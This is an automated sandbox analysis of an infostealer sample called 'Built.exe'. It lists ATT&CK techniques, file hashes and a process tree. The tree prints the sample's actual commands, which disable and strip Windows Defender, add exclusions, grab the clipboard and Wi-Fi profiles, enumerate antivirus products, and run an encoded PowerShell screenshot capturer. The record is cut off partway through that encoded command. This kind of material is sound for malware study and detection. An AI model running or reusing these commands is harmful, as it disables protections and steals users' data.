5f2190af1debcee49a6aa8aa05f97492ce9bd4516c2d3cdaff8206f866117cf6

Resubmissions

08-11-2024 00:11

241108-agpcsaznfx 10

08-11-2024 00:07

241108-aeq4la1cla 10

08-11-2024 00:00

241108-aamwda1blg 10

Analysis

max time kernel
3s
max time network
4s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-11-2024 00:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.5MB
MD5

8c643afe3eae2bfbc531a83f8c1356c7
SHA1

252cec2459cc65df585c959d84b4f24f2e259af3
SHA256

5f2190af1debcee49a6aa8aa05f97492ce9bd4516c2d3cdaff8206f866117cf6
SHA512

e4d52b7537e0c298256c543f198a25e00b67f5f5bfede069f0d6a41696ee1ec0e1f8eac989f7208429af84854d558dbd31158605e65f891d2435e01990991bb8
SSDEEP

196608:1u4jYIJLc52Nt8cQS/1nXy2IIEZVMwICEc/jf:kutcStz9/1nXy22VJb

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3344	powershell.exe
2016	powershell.exe
4396	powershell.exe
2924	powershell.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0007000000023ca9-21.dat	acprotect
behavioral2/files/0x0007000000023c9c-28.dat	acprotect
behavioral2/files/0x0007000000023ca3-46.dat	acprotect
behavioral2/files/0x0007000000023ca2-45.dat	acprotect
behavioral2/files/0x0007000000023ca1-44.dat	acprotect
behavioral2/files/0x0007000000023ca0-43.dat	acprotect
behavioral2/files/0x0007000000023c9f-42.dat	acprotect
behavioral2/files/0x0007000000023c9e-41.dat	acprotect
behavioral2/files/0x0007000000023c9d-40.dat	acprotect
behavioral2/files/0x0007000000023c9b-39.dat	acprotect
behavioral2/files/0x0007000000023cae-38.dat	acprotect
behavioral2/files/0x0007000000023cad-37.dat	acprotect
behavioral2/files/0x0007000000023cac-36.dat	acprotect
behavioral2/files/0x0007000000023ca8-33.dat	acprotect
behavioral2/files/0x0007000000023ca6-32.dat	acprotect
behavioral2/files/0x0007000000023ca7-30.dat	acprotect

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
972	cmd.exe
432	powershell.exe

Loads dropped DLL 16 IoCs

pid	Process
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe
1776	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2032	tasklist.exe
4844	tasklist.exe
64	tasklist.exe
1592	tasklist.exe

UPX packed file 40 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ca9-21.dat	upx
behavioral2/memory/1776-25-0x0000000074F10000-0x00000000754A2000-memory.dmp	upx
behavioral2/files/0x0007000000023c9c-28.dat	upx
behavioral2/memory/1776-48-0x0000000074EA0000-0x0000000074EAD000-memory.dmp	upx
behavioral2/files/0x0007000000023ca3-46.dat	upx
behavioral2/files/0x0007000000023ca2-45.dat	upx
behavioral2/files/0x0007000000023ca1-44.dat	upx
behavioral2/files/0x0007000000023ca0-43.dat	upx
behavioral2/files/0x0007000000023c9f-42.dat	upx
behavioral2/files/0x0007000000023c9e-41.dat	upx
behavioral2/files/0x0007000000023c9d-40.dat	upx
behavioral2/files/0x0007000000023c9b-39.dat	upx
behavioral2/files/0x0007000000023cae-38.dat	upx
behavioral2/files/0x0007000000023cad-37.dat	upx
behavioral2/files/0x0007000000023cac-36.dat	upx
behavioral2/files/0x0007000000023ca8-33.dat	upx
behavioral2/files/0x0007000000023ca6-32.dat	upx
behavioral2/files/0x0007000000023ca7-30.dat	upx
behavioral2/memory/1776-47-0x0000000074EB0000-0x0000000074ED2000-memory.dmp	upx
behavioral2/memory/1776-54-0x0000000074E70000-0x0000000074E97000-memory.dmp	upx
behavioral2/memory/1776-56-0x0000000074E50000-0x0000000074E68000-memory.dmp	upx
behavioral2/memory/1776-58-0x0000000074E30000-0x0000000074E4F000-memory.dmp	upx
behavioral2/memory/1776-60-0x0000000074CF0000-0x0000000074E2F000-memory.dmp	upx
behavioral2/memory/1776-62-0x0000000074CD0000-0x0000000074CE5000-memory.dmp	upx
behavioral2/memory/1776-67-0x0000000074C50000-0x0000000074C7F000-memory.dmp	upx
behavioral2/memory/1776-70-0x00000000748B0000-0x0000000074C44000-memory.dmp	upx
behavioral2/memory/1776-71-0x0000000074800000-0x00000000748A8000-memory.dmp	upx
behavioral2/memory/1776-80-0x00000000746C0000-0x000000007476E000-memory.dmp	upx
behavioral2/memory/1776-75-0x0000000074770000-0x000000007477C000-memory.dmp	upx
behavioral2/memory/1776-74-0x0000000074780000-0x0000000074791000-memory.dmp	upx
behavioral2/memory/1776-66-0x0000000074F10000-0x00000000754A2000-memory.dmp	upx
behavioral2/memory/1776-64-0x0000000074C80000-0x0000000074C8C000-memory.dmp	upx
behavioral2/memory/1776-161-0x0000000074E30000-0x0000000074E4F000-memory.dmp	upx
behavioral2/memory/1776-194-0x0000000074CF0000-0x0000000074E2F000-memory.dmp	upx
behavioral2/memory/1776-214-0x0000000074CD0000-0x0000000074CE5000-memory.dmp	upx
behavioral2/memory/1776-252-0x0000000074C50000-0x0000000074C7F000-memory.dmp	upx
behavioral2/memory/1776-265-0x00000000748B0000-0x0000000074C44000-memory.dmp	upx
behavioral2/memory/1776-294-0x0000000074800000-0x00000000748A8000-memory.dmp	upx
behavioral2/memory/1776-346-0x0000000074CF0000-0x0000000074E2F000-memory.dmp	upx
behavioral2/memory/1776-340-0x0000000074F10000-0x00000000754A2000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3444	cmd.exe
2664	netsh.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
460	systeminfo.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	4396	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 4728 wrote to memory of 1776	4728	Built.exe	83
PID 4728 wrote to memory of 1776	4728	Built.exe	83
PID 4728 wrote to memory of 1776	4728	Built.exe	83
PID 1776 wrote to memory of 3148	1776	Built.exe	87
PID 1776 wrote to memory of 3148	1776	Built.exe	87
PID 1776 wrote to memory of 3148	1776	Built.exe	87
PID 1776 wrote to memory of 3360	1776	Built.exe	88
PID 1776 wrote to memory of 3360	1776	Built.exe	88
PID 1776 wrote to memory of 3360	1776	Built.exe	88
PID 1776 wrote to memory of 372	1776	Built.exe	91
PID 1776 wrote to memory of 372	1776	Built.exe	91
PID 1776 wrote to memory of 372	1776	Built.exe	91
PID 3148 wrote to memory of 2924	3148	cmd.exe	93
PID 3148 wrote to memory of 2924	3148	cmd.exe	93
PID 3148 wrote to memory of 2924	3148	cmd.exe	93
PID 3360 wrote to memory of 2016	3360	cmd.exe	94
PID 3360 wrote to memory of 2016	3360	cmd.exe	94
PID 3360 wrote to memory of 2016	3360	cmd.exe	94
PID 1776 wrote to memory of 2328	1776	Built.exe	95
PID 1776 wrote to memory of 2328	1776	Built.exe	95
PID 1776 wrote to memory of 2328	1776	Built.exe	95
PID 1776 wrote to memory of 1348	1776	Built.exe	96
PID 1776 wrote to memory of 1348	1776	Built.exe	96
PID 1776 wrote to memory of 1348	1776	Built.exe	96
PID 372 wrote to memory of 4396	372	cmd.exe	99
PID 372 wrote to memory of 4396	372	cmd.exe	99
PID 372 wrote to memory of 4396	372	cmd.exe	99
PID 1776 wrote to memory of 3356	1776	Built.exe	100
PID 1776 wrote to memory of 3356	1776	Built.exe	100
PID 1776 wrote to memory of 3356	1776	Built.exe	100
PID 1776 wrote to memory of 1980	1776	Built.exe	101
PID 1776 wrote to memory of 1980	1776	Built.exe	101
PID 1776 wrote to memory of 1980	1776	Built.exe	101
PID 1776 wrote to memory of 972	1776	Built.exe	156
PID 1776 wrote to memory of 972	1776	Built.exe	156
PID 1776 wrote to memory of 972	1776	Built.exe	156
PID 1776 wrote to memory of 4916	1776	Built.exe	155
PID 1776 wrote to memory of 4916	1776	Built.exe	155
PID 1776 wrote to memory of 4916	1776	Built.exe	155
PID 2328 wrote to memory of 2032	2328	cmd.exe	107
PID 2328 wrote to memory of 2032	2328	cmd.exe	107
PID 2328 wrote to memory of 2032	2328	cmd.exe	107
PID 1776 wrote to memory of 2852	1776	Built.exe	109
PID 1776 wrote to memory of 2852	1776	Built.exe	109
PID 1776 wrote to memory of 2852	1776	Built.exe	109
PID 1776 wrote to memory of 3444	1776	Built.exe	105
PID 1776 wrote to memory of 3444	1776	Built.exe	105
PID 1776 wrote to memory of 3444	1776	Built.exe	105
PID 1776 wrote to memory of 4688	1776	Built.exe	140
PID 1776 wrote to memory of 4688	1776	Built.exe	140
PID 1776 wrote to memory of 4688	1776	Built.exe	140
PID 1776 wrote to memory of 852	1776	Built.exe	112
PID 1776 wrote to memory of 852	1776	Built.exe	112
PID 1776 wrote to memory of 852	1776	Built.exe	112
PID 1348 wrote to memory of 1592	1348	cmd.exe	116
PID 1348 wrote to memory of 1592	1348	cmd.exe	116
PID 1348 wrote to memory of 1592	1348	cmd.exe	116

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3316	attrib.exe
2104	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4728
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3148
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3360
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  ‏.scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  ‏.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2328
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1348
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3356
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1980
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:972
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4916
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3444
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2852
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4688
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:852
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIA